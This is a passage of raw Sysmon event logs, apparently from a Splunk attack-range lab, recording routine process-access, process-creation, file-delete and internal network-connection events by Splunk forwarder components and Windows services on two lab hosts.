11:18:21.337{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297802Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:21.337{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297801Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:21.337{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-17FD-6216-3D07-000000003802}6308C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000297800Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:21.337{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297799Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:21.337{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297798Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:21.337{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-17FD-6216-3D07-000000003802}6308C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000297797Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:21.338{C8EA50B7-17FD-6216-3D07-000000003802}6308C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000297806Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:22.767{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=63717E5514B96567D9A1EA07EDC106A6,SHA256=4F202020EEA5BE1299AC784AF8C02C1C2EDB66D2353A9ED06B529512F71676D1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221650Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:22.061{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A3376E1226D90F47DCFFA01C72B94F75,SHA256=257FB362A5CCF0F5648D99516AD8C7AE841BA1F684FE74C442C148F448AD305D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297807Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:23.772{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=70B4E903B1E232E3BAF1B5BAC939F7AC,SHA256=6C1B21B89E5687A0B91164A708158F5719561C15FF885941CF5A0A6290C5963F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221651Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:23.123{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=810C1F71AD3019F3671ECADAEC6988CC,SHA256=56A7BB52F3394315A2C0DEE3678538F7B50A60EC0CDC10D09F5B300EE49C7260,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297808Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:24.793{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=02BE583CA02567E4E6F8400CCDC865E8,SHA256=FD782CADCD02C51D348AC0141BDAD09F3FCF148253A4C1CE60E9C7420F184C8D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221652Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:24.124{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2CF4B64BA243FD2D0D0717D1D1778C25,SHA256=CFE55D9903FE1232FDD03B37C13F04642FB87D71CF8893662DB4D89D463D223C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297809Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:25.808{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2336CEE7D2E05C592F9D61B376B6D4DE,SHA256=D1E915687DF897B36B67326E4D9A920A36E7185E9758DFFF4EAC26568EDBA36C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221653Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:25.326{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CCD40BDA31A294B3516E3156A8531034,SHA256=5572A89775B38D535F0FC8C658C8EFC8B97F7A94299EC836AE365FE54D3C2DDE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297811Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:26.838{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=65671B12A1EF275468DF5133830679DB,SHA256=883D99DEA63A6E7B1F6ADB0C3A968845FEB71C40516CBEC6923AC38268CFE99E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000221655Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:24.716{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51666-false10.0.1.12-8000- 23542300x8000000000000000221654Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:26.358{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=68C1AD737501304BE435A53F1CB78E98,SHA256=4317E86F8DA999734B7C1F6849B23947EB533D3D32E4897B358890F5D64E4E21,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000297810Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:23.645{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49480-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000297812Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:27.841{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=427D086262D2C5EFC07435D4CF7FA9B5,SHA256=8216BCF54B461DF64FF6820516EC701AEAC452A4415B2656AB53C4AD5DE508CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221656Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:27.592{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7BB04419C09CD5B0B1B46AFACE79EEBB,SHA256=F94172A468C7D26A87D0A8630EBA8D3114D101588908C1C534EF87C895333C9B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297813Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:28.871{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BB44A1278CD12ED97DE7B170EB8A5DF2,SHA256=FF4E59B36CAEFF8CDE3BAC70D203D2F652750E79C598C4283613653ED327FA0B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221657Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:28.608{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=09F6CAC1204B9B5AEAA08335F63E9E0B,SHA256=4046088A4D0AD2B332B0A96A526E185C2C52787F4FB5BC47DCC9F21FFB14AFAC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221658Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:29.623{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DBA6CF8F9AC2A7305D2524F3D92823E3,SHA256=599D55958C3354ABE309D25FF412D0CCAE1F29BF8FAF8DE44A69D33935043DD6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297814Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:29.871{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=87A910D4D2152015C3BE94F4A52E67DC,SHA256=1D739ABCA4AA1056F7DBF387BFB92B2CA9B6B8B8AA0EF9C8F88CA88CD1123A48,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221660Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:30.670{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C3FFA3A8B0ADA45EA4E12F37159E1228,SHA256=1C6874AABB95FE95FDC4744EE4833B047ADEA5DFFEE2098BC555CA2C40485726,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297815Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:30.872{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=014ABCD409BCE92357AA77D2F37C4FED,SHA256=83C454DFD78EA4CF175A64423FCF0880B0F0957E0EDBCEE6018B1CCF12F6F1DE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221659Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:30.467{4F8D34B0-F11C-6215-1100-000000003902}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=2F5455BF9CFD18B806465732B8359BCE,SHA256=98DE487C4EDB49F683CFDBD15E0DC66E561B928DA1782DF14CFA0C8D82F86189,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297816Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:31.893{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=51F49B04AD4844D2E6982E4D5A00D96B,SHA256=FE51995AFE92EFB5C19EE2A4542CF4F7F3F71ACCD896091428C111912F2F7C20,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221661Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:31.686{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D692D3B5DD25CD17E4CE52847D904441,SHA256=B3E66111C0B3EF67ED86B84D7D06B953613CCCCE49B56D1A123D2E57ED39B375,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297818Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:32.908{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1817926AAB70EEA2F79ADF6B8B88D86D,SHA256=71866B19E8CE61AF1A458B187736A2041010734048735C992163934375E148EC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221662Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:32.732{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C681A940F34FE7FDE0785BADD45A739,SHA256=0289C0EE13F825C0E1EC065725463473A64D0344167BD2616CB00020B5F76695,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000297817Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:29.645{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49481-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000297820Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:33.955{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B6AE2A4EB8AAB6EF91DA748E0D1EFD8A,SHA256=48D60A2F7D62B03EE1559B1790F01F8ED3C77A626C2E8CEBA45E05A3699370FA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221664Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:33.748{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE62361E544A86823236F2562ADF8096,SHA256=F9EAECC0357B524F93CABFCF6762AADA4DD47A96CB0CB4BD10A8E05DDFA6E215,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297819Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:33.588{C8EA50B7-F11F-6215-1300-000000003802}616NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=5BFAAA4F26AC568506EA7FEDE1DEE973,SHA256=7BAC5857D1ACE1455744D8B5D749597E55C426266072B97ED33333BACEBA57E1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000221663Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:30.684{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51667-false10.0.1.12-8000- 23542300x8000000000000000221665Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:34.764{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=50DC05F7BD0970717B336D59788FB7FD,SHA256=E4F1D44F6E875E0F195FD6E23DCE137ECFA0A1F7C27357DDEFE75E51A97CFDFD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297821Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:34.970{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8B3A320C0446C9A4A6377ACE282865C8,SHA256=565E2E8EF47B6638709775A8B489BF443FD78B29F3C06D99C5DCCBC33868C5A4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221666Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:35.857{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=71CA8749B69AFC9389EB652CF9FEFC53,SHA256=50FD5EDAD507F3B895800D3876405564361CD4C5CAC2D0EE3759831E5262C9E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297822Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:35.991{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=55A77D32A2AEADE9D4D67A176FD66BD1,SHA256=9A6A2C8E3DD9FAC2D1ABE56427A2027286E11C4D5E074E1CCA2D8F018A4D9749,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221667Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:37.076{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6AA77F335745EE952FD0A3872646AA3F,SHA256=56188912E450CDE2D28116B606AF96398805CC7839B8A32949DA3423348BAC1D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000297824Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:34.728{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49482-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000297823Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:37.028{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=417CBDD75CB568838EF237CFD4E910EB,SHA256=0D89110B865D42443546BFFE67198B2851D59353836F719C39C91E85A024C210,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221668Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 